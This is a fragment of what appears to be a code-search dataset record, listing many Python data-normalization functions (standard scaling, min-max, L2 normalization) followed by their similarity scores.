mu = array.mean()\n sigma = array.std()\n\n return array_normalized, mu, sigma", "def normalize_X(X):\n scaler = preprocessing.StandardScaler()\n X = scaler.fit_transform(X)\n return X", "def normalize(self):\n self._vectors = [vector.normalized() for vector in self._vectors]", "def normalize_train_data(train_data, hter=False):\n feats = train_data[:, :-1]\n labels = train_data[:, -1]\n if hter:\n labels_pw = labels\n else:\n labels_pw = labels / feats[:, 1]\n scaler = pp.StandardScaler()\n scaler.fit(feats)\n norm_feats = scaler.transform(feats)\n return np.concatenate((norm_feats, labels_pw[:, None]), axis=1), scaler", "def normalize(feats, train_nid, dtype=np.float32):\n train_feats = feats[train_nid]\n scaler = preprocessing.StandardScaler()\n scaler.fit(train_feats)\n feats = scaler.transform(feats)\n return feats.astype(dtype)", "def normalize_features(self, scaler: StandardScaler = None, replace_nan_token: int = 0) -> StandardScaler:\n if len(self.data) == 0 or self.data[0].features is None:\n return None\n\n if scaler is not None:\n self.scaler = scaler\n\n elif self.scaler is None:\n features = np.vstack([d.features for d in self.data])\n self.scaler = StandardScaler(replace_nan_token=replace_nan_token)\n self.scaler.fit(features)\n\n for d in self.data:\n d.set_features(self.scaler.transform(d.features.reshape(1, -1))[0])\n\n return self.scaler", "def normalize_data(x):\n mvec = x.mean(0)\n stdvec = x.std(axis=0)\n \n return (x - mvec)/stdvec", "def normalize_data(x):\n mvec = x.mean(0)\n stdvec = x.std(axis=0)\n \n return (x - mvec)/stdvec", "def normalize(dataset):\n minVals = dataset.min(axis=0)\n maxVals = dataset.max(axis=0)\n factors = maxVals-minVals\n num = dataset.shape[0]\n norm_data = (dataset - 
np.tile(minVals,(num,1)))/np.tile(factors,(num,1)) \n return norm_data", "def normalize(feats_Xy, trace_normalize=True, data=None):\n feats, labels = zip(*feats_Xy)\n if data is None:\n train_f = feats[0]\n m = train_f.mean(axis=0)\n s = np.maximum(train_f.std(axis=0), 1e-8)\n else:\n m = data['train_mean']\n s = data['train_std']\n feats = [(f - m) / s for f in feats]\n if trace_normalize:\n if data is None:\n train_f = feats[0]\n tr = np.maximum(np.sqrt((train_f**2).sum(axis=1)).mean(), 1e-8)\n else:\n tr = data['trace']\n else:\n tr = None\n if trace_normalize:\n feats = [f / tr for f in feats]\n feats_Xy = tuple(zip(feats,labels))\n return feats_Xy + (m, s, tr)", "def standardiser(self):\n # Select only numeric features first\n\n #self.X = self.data.loc[:, self.data.columns != self.target].values\n numeric_columns = []\n for col in self.X.columns:\n if self.X[col].dtype!='object':\n numeric_columns.append(col)\n scaler = preprocessing.StandardScaler().fit(self.X[numeric_columns]) \n # Now we can standardise\n self.X[numeric_columns] = scaler.transform(self.X[numeric_columns])", "def normalize_data(self):\r\n # quantify data for each column except classification column for noise reduction\r\n for column_header in self.classification_training_data.columns:\r\n if column_header == \"Class\":\r\n continue\r\n if column_header == \"Age\":\r\n bin_size = 2\r\n elif column_header == \"Ht\":\r\n bin_size = 5\r\n else:\r\n bin_size = 1\r\n for idx in self.classification_training_data.index:\r\n self.classification_training_data.at[idx, column_header] = math.floor(\r\n self.classification_training_data[column_header][idx] / bin_size) * bin_size", "def _preprocess(self, data, normalize=False) -> np.ndarray:\n \n preprocessor = StandardScaler() if not normalize else Normalizer()\n\n data = preprocessor.fit_transform(data)\n \n return data", "def normalize_feature_vector(self, features):\n\n features_normalized = features / np.repeat(np.linalg.norm(features, ord=2, axis=1).reshape(\n (features.shape[0], 1)), features.shape[1], axis=1)\n\n return features_normalized", "def normalize_feature(feature):\n # Compute mean and standard deviation, and return (x-mu)/std\n mean = np.mean(feature)\n std = np.std(feature)\n return np.divide(np.subtract(feature, mean), std)", "def specific_normalization(df):\n # Need to scale some vars. 
This is done using a StandardScaler from sklearn package\n scaler = StandardScaler()\n df['Pclass'] = df['Pclass'].astype('float64')\n df['Family'] = df['Family'].astype('float64')\n # .reshape(-1, 1) is mandatory otherwise an exception is thrown (as 'data has a single feature')\n df['Pclass'] = scaler.fit_transform(df['Pclass'].values.reshape(-1, 1))\n df['Family'] = scaler.fit_transform(df['Family'].values.reshape(-1, 1))\n\n return df", "def normalize_features(self, scaler: StandardScaler = None, replace_nan_token: int = 0) -> StandardScaler:\n raise NotImplemetedError(\"AtomisticDataset.normalize_features is not implemeneted.\")\n # if len(self.data) == 0 or self.data[0].features is None:\n # return None\n #\n # if scaler is not None:\n # self.scaler = scaler\n #\n # elif self.scaler is None:\n # features = np.vstack([d.features for d in self.data])\n # self.scaler = StandardScaler(replace_nan_token=replace_nan_token)\n # self.scaler.fit(features)\n #\n # for d in self.data:\n # d.set_features(self.scaler.transform(d.features.reshape(1, -1))[0])\n #\n # return self.scaler", "def set_normalization(self, dataloader):\n mean = 0\n square = 0\n for (data_in, _) in dataloader:\n mean += data_in.mean()\n square += data_in.pow(2).mean()\n\n mean /= len(dataloader)\n square /= len(dataloader)\n std = np.sqrt(square - mean ** 2)\n\n # The input data should be roughly normally distributed after\n # passing through net_fixed.\n self.scale_in.bias.data.fill_(- mean / std)\n self.scale_in.weight.data.fill_(1 / std)", "def __call__(self, features):\n norm = []\n for data in features:\n if all(x == 0 for x in data):\n norm.append(data)\n else:\n scale = sum(x*x for x in data) ** 0.5\n normalized_data = [x / scale for x in data]\n norm.append(normalized_data)\n \n return norm", "def df_normalizer(df):\n df = tf.keras.utils.normalize(df, axis=1)\n\n return df", "def normalize_train_data(self, data_vector, clf_type = \"generic\"):\n\t\tassert(clf_type in [\"generic\", \"specific\"])\n\n\t\tif clf_type == \"generic\":\n\t\t\tself.mean_per_dim_generic = []\n\t\t\tmean_per_dim = self.mean_per_dim_generic\n\t\t\tself.std_per_dim_generic = []\n\t\t\tstd_per_dim = self.std_per_dim_generic\n\t\telse:\n\t\t\tself.mean_per_dim_specific = []\n\t\t\tmean_per_dim = self.mean_per_dim_specific\n\t\t\tself.std_per_dim_specific = []\n\t\t\tstd_per_dim = self.std_per_dim_specific\n\n\t\tper_dim = zip(*data_vector)\n\n\t\tfor i in xrange(len(per_dim)):\n\t\t\n\t\t\tm = np.float64(sum (per_dim[i]) / float (len(per_dim[i])))\n\t\t\ts = np.std(per_dim[i])\n\t\t\tper_dim[i] -= m\n\t\t\tif s>0:\n\t\t\t\tper_dim[i] /= s\n\t\t\n\t\t\tmean_per_dim.append(m)\n\t\t\tstd_per_dim.append(s)\n\t\n\t\tdata_vector = zip(*per_dim)\n\t\tfor i in xrange(len(data_vector)):\n\t\t\tdata_vector[i] = list(data_vector[i])\n\n\t\treturn data_vector", "def normalize(X):\n\tX = X - np.mean(X,axis=1)[:,np.newaxis]\n\tX = X/np.std(X,axis=0)[np.newaxis,:];\n\tX = X - np.mean(X,axis=0)[np.newaxis,:]\n\treturn X", "def normalize_data(data=None):\n # Data pre-processing\n n = data.shape[0]\n for i in range(n):\n xx = data[i,:,:]\n xx -= np.mean(xx) # Centering in 0\n xx /= np.linalg.norm(xx) # Normalizing to 1\n data[i] = xx # Affect value\n return data", "def normalize_data(data):\n mean = np.mean(data)\n std = np.std(data)\n return (data - mean) / std", "def normalize_feats(self):\n if self.feats is not None:\n self.feats = normalize(self.feats, axis=1)", "def normalize(data):\n data = lowercase(data)\n data = remove_punct(data)\n data = 
remove_apostrophes(data)\n data = remove_stopwords(data)\n data = num_to_words(data)\n data = lemmatize(data)\n data = stemming(data)\n data = remove_punct(data)\n data = num_to_words(data)\n data = lemmatize(data)\n data = stemming(data)\n data = remove_punct(data) #done again to remove hyphens produced by num2words\n data = remove_stopwords(data) #done agan to remove stopwords produced by num2words\n return data", "def normalise(self):\n s = self._sum()\n if s != 0:\n for element, value in self.focals.items():\n self.focals[element] /= s", "def normalize_datasets(train, test):\n columns = train.columns[:-1]\n train[columns] = (train[columns] - train[columns].mean()) / (train[columns].max() - train[columns].min())\n test[columns] = (test[columns] - test[columns].mean()) / (test[columns].max() - test[columns].min())\n\n return train, test", "def normalise_features(customer_df, features_to_normalise: List[str] = ['recency', 'frequency', 'total_spend']):\n \n for feature in features_to_normalise:\n if feature in customer_df.columns:\n customer_df[feature] = PropensityModel.normalise_series(customer_df[feature])\n return customer_df", "def normalize_labels(self):\n self.y_mean, self.y_std = du.get_mean_std(self.y_train)\n self.y_train = du.normalize(self.y_train, self.y_mean, self.y_std)\n if self.x_test is not None and self.y_test is not None:\n self.y_test = du.normalize(self.y_test, self.y_mean, self.y_std)", "def normalize(self):\n norm_val = self.sum2/self.sum1\n self.sum1=0\n\n for sentence in self.data_set:\n sentence.weight *= norm_val\n self.sum1 += sentence.weight", "def __call__(self, features: List[List[float]]) -> List[List[float]]:\n normalized_features = []\n for feature in features:\n magnitude = np.linalg.norm(feature)\n if magnitude != 0:\n feat = [a/magnitude for a in feature]\n normalized_features.append(feat)\n else:\n normalized_features.append(feature)\n return normalized_features\n #raise NotImplementedError", "def normalize_data(self, data):\n self.find_mean_std(data)\n return (data - self._data_mean) / self._data_std", "def normalize_data(data, class_name):\n row_count = len(data.index)\n col_count = len(data.columns)\n normalized_data = []\n\n normalized_class_list = []\n class_list = data.iloc[(range(row_count)), 0].values\n for value in class_list:\n normalized_class_list.append(1 if value == class_name else 0)\n normalized_data.append(normalized_class_list)\n\n for index in range(1, col_count):\n feature_list = data.iloc[(range(row_count)), index].values\n normalized_data += normalize(feature_list)\n \n return normalized_data", "def normalizeFeatures(lp):\n # optimized for any sized feature vector\n numFeatures = len(lp.features)\n featureList = []\n for i in range(numFeatures):\n normalizedFeature = (lp.features[i] - meanOfFeatures[i])/stdDevFeatures[i]\n featureList.append(normalizedFeature)\n returnLabeledPoint = LabeledPoint(lp.label, featureList)\n return returnLabeledPoint", "def de_normalize_data(self, df):\n if len(df) == 0:\n return df\n result = df.copy()\n for feature_name in self.continuous_feature_names:\n max_value = self.permitted_range[feature_name][1]\n min_value = self.permitted_range[feature_name][0]\n result[feature_name] = (\n df[feature_name]*(max_value - min_value)) + min_value\n return result", "def __call__(self, features: List[List[float]]) -> List[List[float]]:\n # raise NotImplementedError\n features_normalized = []\n for feature in features:\n norm = np.linalg.norm(feature)\n if norm != 0:\n feature_normalized = feature/norm\n 
features_normalized.append(feature_normalized.tolist())\n else:\n features_normalized.append([0] * len(feature))\n return features_normalized", "def normalize(data):\n\n p_means = np.mean(data,axis=0)\n p_vars = np.var(data,axis=0)\n\n # subtract dc component\n data = data-p_means\n\n # contrast normalize \n data = data/np.sqrt(p_vars+10) # plus 10 to account for small variances\n \n return data", "def normalize(data):\n data = numpy.asmatrix(data)\n std_devs = numpy.std(data, axis=1)\n std_devs[std_devs == 0] = 1 # prevent div by 0\n return (data - numpy.mean(data, axis=1)) / std_devs", "def _transform(self, data):\r\n mean, variance = self._input_statistics.overall_feature_moments\r\n return (data - mean) / variance", "def normalizeData(self, data):\n return _normalizeData(data)", "def normalizeData(self, data):\n return _normalizeData(data)", "def normalize(data):\n row = np.size(data, 0) # number of data points\n col = np.size(data, 1) # dimensionality of data points\n for j in range(col):\n # find the average for each column\n col_sum = 0\n for i in range(row):\n col_sum = col_sum + data[i][j]\n col_sum = col_sum / row\n # subtract the average from each value in the column\n for i in range(row):\n data[i][j] = data[i][j] - col_sum\n return data", "def normalize(data):\n row = np.size(data, 0) # number of data points\n col = np.size(data, 1) # dimensionality of data points\n for j in range(col):\n # find the average for each column\n col_sum = 0\n for i in range(row):\n col_sum = col_sum + data[i][j]\n col_sum = col_sum / row\n # subtract the average from each value in the column\n for i in range(row):\n data[i][j] = data[i][j] - col_sum\n return data", "def normalize(raw_feature_list):\n result={}\n for feature in raw_feature_list:\n mean=statistics.mean(raw_feature_list[feature])\n stdev=statistics.pstdev(raw_feature_list[feature])\n print(feature,':','mean:',mean,'stdev:',stdev)\n for i in range(len(raw_feature_list[feature])):\n raw_feature_list[feature][i]-= mean\n raw_feature_list[feature][i]/= stdev", "def normalize_test_vector(self, data_vector, clf_type = \"generic\"):\n\n\t\tassert(clf_type in [\"generic\", \"specific\"])\n\n\t\tif clf_type == \"generic\":\n\t\t\tmean_per_dim = self.mean_per_dim_generic\n\t\t\tstd_per_dim = self.std_per_dim_generic\n\t\telse:\n\t\t\tmean_per_dim = self.mean_per_dim_specific\n\t\t\tstd_per_dim = self.std_per_dim_specific\n\n\n\t\tfor i in xrange(len(mean_per_dim)):\n\t\t\tdata_vector[i] -= mean_per_dim[i]\n\t\t\tdata_vector[i] /= std_per_dim[i]\n\t\t\n\t\n\t\treturn data_vector", "def normalize(self):\n self.desc += \", normalize\"\n self._vecs /= np.linalg.norm(self._vecs, axis=1)[:, np.newaxis]\n self.reindex()", "def normalise(self):\n return self / self.mean(axis=1).reshape(self.shape[0], 1)", "def scalarNormalizer(df):\r\n arr=dict()\r\n for col in CONT_FEATURES_COL_TO_USE:\r\n mean, std =df[col].mean(), df[col].std()\r\n df[col]=df[col].apply(lambda x: (x-mean)/std)\r\n arr[col] = [mean, std]\r\n json.dump(arr, open('normalize.json', 'w'))\r\n return df", "def standardize_data(X_train, X_test):\n scaler = StandardScaler()\n scaler.fit(X_train)\n X_train = scaler.transform(X_train)\n # apply same transformation to test data\n X_test = scaler.transform(X_test)\n return X_train, X_test", "def _normalize(self):\r\n self.dataframe['norm_intensity'] = self.dataframe['intensity']\r\n self.dataframe['norm_intensity'] -= self.dataframe['norm_intensity'].min()\r\n self.dataframe['norm_intensity'] /= self.dataframe['norm_intensity'].max() * 0.01", 
"def normalize(self, df):\n return (df - df.mean()) / (df.max() - df.min())", "def normalize(self, attr_name): # DONE\n self.data[attr_name] = (self.data[attr_name] - self.data[attr_name].mean()) / self.data[attr_name].std()", "def normalize(data):\n # normalize data and return\n # https://stackoverflow.com/questions/29661574/normalize-numpy-array-columns-in-python\n return (data - data.min(axis=0)) / data.ptp(axis=0)", "def normalize_ds(dataset):\n dataset = copy.copy(dataset)\n\n dim_dataset = dataset.shape\n\n for n_row in range(dim_dataset[0]):\n k = dataset[n_row,:]\n k_norm =(k - np.min(k))/(np.max(k) - np.min(k))\n dataset[n_row,:] = k_norm\n\n return dataset", "def normalize_all(self):\n #for i, vector in enumerate(self.real_vectors):\n # self.real_vectors[i] /= np.linalg.norm(vector)\n self.vectors /= np.linalg.norm(self.vectors, axis=1).reshape(-1,1)\n for i, vector in enumerate(self.real_vectors):\n vector.set(self.vectors[i])", "def test_normalization_scalar(features: List[List[float]]) -> List[List[float]]:\n normalized_features = []\n for feature in features:\n sum_squares = 0\n for i in feature:\n sum_squares += i * i\n sum_squares_root = np.sqrt(sum_squares)\n if sum_squares == 0:\n normalized_features.append(feature)\n else:\n normalized_features.append([x / sum_squares_root for x in feature])\n return normalized_features", "def _normalize(self, x):\n # TODO: imagenet normalization\n\n return x", "def normalize(self):\n self.number_of_vectors = self.values.shape[0]\n norm_2 = np.linalg.norm(self.values, axis=1)\n norm_1 = np.sum(self.values_planar, axis=1)\n norm_2 = np.repeat(norm_2, self.number_of_objectives).reshape(\n self.number_of_vectors, self.number_of_objectives\n )\n norm_1 = np.repeat(norm_1, self.number_of_objectives).reshape(\n self.number_of_vectors, self.number_of_objectives\n )\n norm_2[norm_2 == 0] = np.finfo(float).eps\n self.values = np.divide(self.values, norm_2)\n self.values_planar = np.divide(self.values_planar, norm_1)", "def normalise(self):\n fitness_sum = np.sum(self.fitness)\n for i in range(self.loops):\n self.normalised_fitness[i] = self.fitness[i] / fitness_sum", "def _normalize_data(self, method='median'):\n pos = np.unique(self.pos.values())\n if hasattr(self, '_raw_data'):\n # data has been already normalized; take original data\n self.data = copy.deepcopy(self._raw_data)\n else:\n # preserve original calculated data\n self._raw_data = copy.deepcopy(self.data)\n\n for var in self.variables:\n for p in pos:\n # calculate multimodel mean/median\n xm = self._get_mean_value(p, var, method=method)\n for k in self.data:\n if (self.pos[k] == p) & ('_' + var + '_' in k):\n self.data[k] = (self.data[k] - xm) / xm # see Glecker et al, eq.2", "def normalize_transform():\n\n # Default for PyTorch's pre-trained models\n return transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])", "def normalize(X):\n # z-score\n mean = np.mean(X, axis=(0, 1, 2, 3))\n std = np.std(X, axis=(0, 1, 2, 3))\n # avoid dividing zero by adding a very small number\n X = (X - mean) / (std + 1e-7)\n\n return X", "def normalize_test_data(test_data, scaler):\n feats = test_data[:, :-1]\n labels = test_data[:, -1]\n labels_pw = labels / feats[:, 1]\n norm_feats = scaler.transform(feats)\n return np.concatenate((norm_feats, labels_pw[:, None]), axis=1)", "def normalize(x):\n # TODO: Implement Function\n data_max = np.max(x)\n data_min = np.min(x)\n x = (x - data_min) / (data_max - data_min)\n return x", "def normalize_attributions(self, att_list, 
positive=False, normalizer='MinMaxScaler'):\n all_values = np.concatenate(att_list)\n all_values = all_values[all_values > 0] if positive else all_values\n\n if normalizer == 'QuantileTransformer':\n normalizer = sklearn.preprocessing.QuantileTransformer()\n elif normalizer == 'MaxAbsScaler':\n normalizer = sklearn.preprocessing.MaxAbsScaler()\n else:\n normalizer = sklearn.preprocessing.MinMaxScaler()\n normalizer.fit(all_values.reshape(-1, 1))\n \n new_att = []\n for att in att_list:\n normed_nodes = normalizer.transform(att.reshape(-1, 1)).ravel()\n new_att.append(normed_nodes)\n return new_att", "def normalize(self):\n if self.normed:\n return\n self._normalize()", "def normalize(self, x, train=True):\n if train is not None:\n mean, variance = tf.nn.moments(x, [0,1,2])\n assign_mean = self.mean.assign(mean)\n assign_variance = self.variance.assign(variance)\n with tf.control_dependencies([assign_mean, assign_variance]):\n return tf.nn.batch_norm_with_global_normalization(\n x, mean, variance, self.beta, self.gamma,\n self.epsilon, self.scale_after_norm)\n else:\n mean = self.ewma_trainer.average(self.mean)\n variance = self.ewma_trainer.average(self.variance)\n local_beta = tf.identity(self.beta)\n local_gamma = tf.identity(self.gamma)\n return tf.nn.batch_norm_with_global_normalization(\n x, mean, variance, local_beta, local_gamma,\n self.epsilon, self.scale_after_norm)", "def normalization(self, set):\n\n #epsilon = np.random.randn(np.array(set).shape[0],np.array(set).shape[1])\n #variance = np.var(set+epsilon, axis=0)\n mean = np.mean(set, axis=0)\n variance = np.var(set, axis=0)\n set = (set - mean)/variance\n\n return set", "def fit(self, dataset, labels):\n self.dataset = dataset\n self.labels = labels\n self.normalization_n = []\n self.normalization_d = []\n self.first_title = list(self.dataset.keys())[0]\n for ind in range(len(self.dataset[self.first_title])):\n self.normalize_features(self.dataset, ind)", "def _scale_features(self, features):\n assert isinstance(features, np.ndarray), \"Input is not a numpy array!\"\n\n return self.scaler.transform(features.reshape(1, -1))", "def normalize(df, excludes):\n\n result = df.copy()\n for feature_name in df.columns:\n if feature_name in excludes:\n continue\n try:\n max_value = df[feature_name].max()\n min_value = df[feature_name].min()\n if max_value == min_value:\n min_value = 0\n result[feature_name] = (df[feature_name] - min_value) / (max_value - min_value)\n result[feature_name] = result[feature_name].apply(lambda x: round(abs(x), 4))\n except:\n LOGGER.error(f'Error normalizing feature: {feature_name}')\n raise RuntimeError(f'Error normalizing feature: {feature_name}')\n return result", "def normalize_data(data_frame):\n min_max_scaler = preprocessing.MinMaxScaler()\n x_scaled = min_max_scaler.fit_transform(data_frame)\n return pd.DataFrame(x_scaled)", "def normalize(data):\n data_range = data.max() - data.min()\n #if data_range == 0.:\n # sys.exit(\"data.max() - data.min() == 0. !\")\n if stddev != 0.:\n data = (data - data.min()) / data_range\n\n return data" ]
[ "0.79551655", "0.79528546", "0.7853807", "0.77867204", "0.7698743", "0.76595855", "0.76581943", "0.7635334", "0.76207286", "0.7542891", "0.75298584", "0.74793464", "0.74740255", "0.7413795", "0.7318681", "0.73162293", "0.7313582", "0.72916085", "0.72567785", "0.7242953", "0.7227996", "0.7196083", "0.7143606", "0.7109897", "0.70956826", "0.7046461", "0.7024581", "0.70157343", "0.6989634", "0.69502217", "0.6945149", "0.6928351", "0.6928351", "0.69184875", "0.69118637", "0.69086367", "0.68908876", "0.6881575", "0.6873502", "0.68728405", "0.68711287", "0.68684787", "0.6859474", "0.68510824", "0.6840289", "0.6801087", "0.67932326", "0.678247", "0.67806756", "0.67790633", "0.67766184", "0.67654705", "0.6760335", "0.6756144", "0.67541695", "0.67362463", "0.671197", "0.6708384", "0.66970205", "0.6691158", "0.6652749", "0.66510284", "0.6644678", "0.66443783", "0.66319746", "0.6630462", "0.6630462", "0.662491", "0.662491", "0.66037834", "0.6598514", "0.6583471", "0.6573423", "0.6559674", "0.6529994", "0.65205336", "0.6514339", "0.6506325", "0.65013146", "0.6500694", "0.64780563", "0.64581656", "0.645138", "0.64500743", "0.6448489", "0.6444722", "0.64442647", "0.6440666", "0.643224", "0.6419304", "0.6414838", "0.64084756", "0.63965565", "0.6373919", "0.63693774", "0.63293105", "0.63283086", "0.6325928", "0.63210505" ]
0.7320142
15
Compute the cost function given a set of features / values, and the values for our thetas.
def compute_cost(features, values, theta):
    # your code here
    error = (values - features.dot(theta))
    cost = error.dot(error)
    return cost
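For reference, a minimal, self-contained usage sketch of the document above. The sample data, array shapes, and printed value are illustrative assumptions, not part of the dataset; the function body simply mirrors the document:

import numpy as np

def compute_cost(features, values, theta):
    # Mirrors the document above: sum of squared errors between the
    # linear prediction features.dot(theta) and the target values.
    error = (values - features.dot(theta))
    cost = error.dot(error)
    return cost

# Illustrative inputs (assumed): 3 samples, a bias column plus one predictor.
features = np.array([[1.0, 1.0],
                     [1.0, 2.0],
                     [1.0, 3.0]])
values = np.array([2.0, 2.0, 3.0])
theta = np.array([1.0, 0.5])

print(compute_cost(features, values, theta))  # 0.5

Note that, unlike several of the negatives listed below, this variant does not divide by 2*m; it returns the raw sum of squared errors.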
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def compute_cost(features, values, theta):\r\n m = len(values)\r\n sum_of_square_errors = numpy.square(numpy.dot(features, theta) - values).sum()\r\n cost = sum_of_square_errors / (2*m)\r\n\r\n return cost", "def compute_cost(features, values, theta):\n m = len(values)\n sum_of_square_errors = np.square(np.dot(features, theta) - values).sum()\n cost = sum_of_square_errors / (2 * m)\n\n return cost", "def compute_cost(features, values, theta):\n\n npoints = len(values)\n sum_of_square_errors = np.square(np.dot(features, theta) - values).sum()\n cost = sum_of_square_errors / (2*npoints)\n\n return cost", "def compute(self, F, variables):\n s_0 = self.initial_state_generator(self.num_samples)\n a_0 = self.policy(s_0)\n a_t_plus_1 = a_0\n x_t = F.expand_dims(F.concat(s_0, a_0, dim=1), axis=1)\n cost = 0\n for t in range(self.n_time_steps):\n variables[self.model.X] = x_t\n res = self.model.Y.factor.predict(F, variables, targets=[self.model.Y], num_samples=self.num_samples)[0]\n s_t_plus_1 = res[0]\n\n cost = cost + self.cost_function(s_t_plus_1, a_t_plus_1)\n\n a_t_plus_1 = mx.nd.expand_dims(self.policy(s_t_plus_1), axis=2)\n x_t = mx.nd.concat(s_t_plus_1, a_t_plus_1, dim=2)\n total_cost = F.sum(cost)\n return total_cost, total_cost", "def _objective_function(self, thetas, X, Y):\n \n # Convert thetas vector to form total_cost can understand\n thetas = self.reshape_thetas(thetas, 'list')\n self.thetas = thetas\n \n # Get cost function value\n fval = self.total_cost(X, Y, thetas)\n \n # Get derivatives using back propagation\n Deltas = self.get_gradients(X, Y)\n dfval = self.reshape_thetas(Deltas, 'vector')\n \n return fval, dfval", "def cofiCostFunc(self,params, *args):\n\t\tY, R, num_users, num_products, num_features,l = args[0], args[1],args[2], args[3],args[4],args[5]\n\n\t\taux = params.reshape((num_products + num_users, num_features))\n\n\t\tX = aux[0:num_products , :]\n\n\t\tTheta = aux[num_products:, :] \n\n\t\ttest = np.dot(X,Theta.transpose())\n\t\ttest = test - Y\n\t\ttest = np.multiply(test , R)\n\t\ttest = np.power(test,2)\n\t\ttest = test.sum()\n\t\ttest = 0.5 * test\n\n\t\tJ = 0;\n\t\tregularization = (l * 0.5) * np.power(X,2).sum() + np.power(Theta,2).sum()\n\n\t\tJ = test# + regularization\n\n\t\treturn J", "def eval_cost(self, params, **kwargs):\n raise NotImplementedError", "def get_cost_updates(self):\n\n y = self.get_hidden_values()\n z = self.get_reconstructed_input(y)\n\n L = T.sum((self.x-z)**2, axis=1)\n\n cost = T.mean(L)\n\n return cost", "def costFun(self, x):\n\ttmp = x.reshape(self.inp_shape)\n\tc = np.float64(self.calcCost(np.asarray(tmp,dtype=np.float32))) + self.alpha * np.dot(x.T, x)\n\treturn c", "def cofiCostFunc(params, Y, R, num_users, num_movies, num_features, lbd):\n X = np.reshape(params[:num_movies*num_features], (num_movies, num_features))\n Theta = np.reshape(params[num_movies*num_features:], (num_users, num_features))\n\n # J=sum((X*Theta'-Y)^2) where R[i,j]==1\n h = X.dot(Theta.T)-Y\n M = h**2\n J = (M*R).sum()/2\n reg = lbd/2*((X**2).sum()+(Theta**2).sum())\n J = J+reg\n\n X_grad = (h*R).dot(Theta)+lbd*X\n Theta_grad = (h*R).T.dot(X)+lbd*Theta\n\n grad = np.r_[X_grad.flatten(), Theta_grad.flatten()]\n return J, grad", "def calculate_cost(theta_values, data):\n population = data[:,0]\n prices = data[:,1]\n total_error = 0\n for i in range(0,len(population)):\n x = array([[1],[population[i]]])\n hypothesis = theta_values.dot(x).flatten() \n squared_error = (hypothesis - prices[i])**2\n total_error += squared_error\n return 
.5*total_error/len(population) #division by m is just a scaling factor since we're only interested in whether this function is minimized", "def calcCostFun(self):\n\n self.start()\n F, K = self.model()\n \n return self.costFunction", "def cost_function(self, config_samples):\n cost = self.work_tracker(config_samples)\n return cost", "def cost_function(param, Y, R, n_features):\r\n # theta (user, feature), (943, 10): user preference\r\n # X (movie, feature), (1682, 10): movie features\r\n n_movie, n_user = Y.shape\r\n X, theta = deserialize(param, n_movie, n_user, n_features)\r\n\r\n inner = np.multiply(X @ theta.T - Y, R)\r\n\r\n return np.power(inner, 2).sum() / 2", "def compute_cost(AL, Y):\n pass", "def _cost_method(self, *args, **kwargs):\n\n cost_val = 0.5 * np.linalg.norm(self.obs_data - self.op(args[0])) ** 2\n\n if 'verbose' in kwargs and kwargs['verbose']:\n print(' - DATA FIDELITY (X):', cost_val)\n\n return cost_val", "def costFun(self, S, x):", "def cofiCostFunc(params, Y, R, num_users, num_movies, num_features, reg_lambda, returnCostOnly=False,\n returnGradOnly=False):\n\n # Unfold the U and W matrices from params\n X = params[0:num_movies * num_features].reshape((num_movies, num_features))\n Theta = params[num_movies * num_features:].reshape((num_users, num_features))\n\n errors = (X.dot(Theta.T) - Y) * R\n J = 1 / 2 * np.sum(np.sum(errors ** 2))\n\n penalty = (reg_lambda / 2) * (np.sum(np.sum(Theta ** 2)) + np.sum(np.sum(X ** 2)))\n J = J + penalty\n\n X_grad = errors.dot(Theta) + reg_lambda * X\n Theta_grad = errors.T.dot(X) + reg_lambda * Theta\n\n grad = np.r_[X_grad.flatten(), Theta_grad.flatten()]\n\n if returnGradOnly:\n return grad.flatten()\n if returnCostOnly:\n return J\n\n return J, grad", "def total_cost(self, X, Y, thetas = None):\n \n if thetas == None:\n thetas = self.thetas\n \n J = 0.0\n m = X.shape[0]\n for x, true_indx in zip(X, Y):\n y = np.zeros(self.noutputs)\n y[true_indx] = 1.\n h_theta = self._forward_prop(x, thetas)[-1]\n J += self.cost(h_theta, y)\n \n return np.sum(J)/m", "def test_gradient(gradient, thetas, activations_neural, classification_matrix, lambda_value=1, step=1E-4, tolerance=1E-4):\n \n dimensional_error(thetas[-1].shape, gradient[-1].shape)\n\n last_thetas = thetas[-1]\n \n last_thetas_plus_step = thetas[-1] + step\n last_thetas_minus_step = thetas[-1] - step\n\n num_grad_total = pd.DataFrame()\n\n for i in range( gradient[-1].shape[0] ):\n\n\n last_thetas_plus = pd.concat( [last_thetas[0:i], last_thetas_plus_step[i:i+1] , last_thetas[i+1:]] , axis=0 )\n\n last_thetas_minus = pd.concat( [last_thetas[0:i], last_thetas_minus_step[i:i+1], last_thetas[i+1:]] , axis=0 )\n\n last_activation_plus = activation_values(activations_neural[-2], last_thetas_plus ).to_numpy()\n last_activation_minus = activation_values(activations_neural[-2], last_thetas_minus).to_numpy()\n\n cost_plus = cost_function_sigmoid([last_activation_plus] , classification_matrix, [last_thetas_plus] , lambda_value)\n cost_minus = cost_function_sigmoid([last_activation_minus], classification_matrix, [last_thetas_minus], lambda_value)\n\n num_grad = (cost_plus - cost_minus)/(2*step) # it's a column DataFrame\n num_grad_total = pd.concat([num_grad_total, num_grad], axis=1)\n\n num_grad_total = num_grad_total.T\n\n dimensional_error(num_grad_total.shape, gradient[-1].shape)\n\n num_grad_total.index = gradient[-1].index\n num_grad_total.columns = gradient[-1].columns\n\n _ = ( np.abs( gradient[-1].to_numpy() - num_grad_total.to_numpy() ) <= tolerance )\n\n return _, 
num_grad_total", "def build_cost_fn_and_opt(lstm_outputs, labels_, learning_rate):\n predictions = tf.contrib.layers.fully_connected(lstm_outputs[:, -1], 1, activation_fn=tf.sigmoid)\n loss = tf.losses.mean_squared_error(labels_, predictions)\n optimzer = tf.train.AdadeltaOptimizer(learning_rate).minimize(loss)\n \n return predictions, loss, optimzer", "def individual_cost_function(gp, output_trajectory, output_times):\r\n # GET RIGHT PART OF ARRAY\r\n # REFORMAT\r\n # NOISE DATA\r\n # PREDICT NEW VALUES\r\n # GET COST.\r\n X_reshaped = output_times[:,None]\r\n # X_list = GPy_reformat_3D(output_times)\r\n # Y_list = GPy_reformat_3D(output_trajectory)\r\n\r\n # X_list = np.concatenate((X_reshaped,X_reshaped,X_reshaped), axis=1)\r\n X_list = X_reshaped\r\n array1 = output_trajectory.T[:, 0, None]\r\n array2 = output_trajectory.T[:, 1, None]\r\n array3 = output_trajectory.T[:, 2, None]\r\n Y_list = np.concatenate((array1,array2,array3),axis=1)\r\n Y_list = array1\r\n X_list = 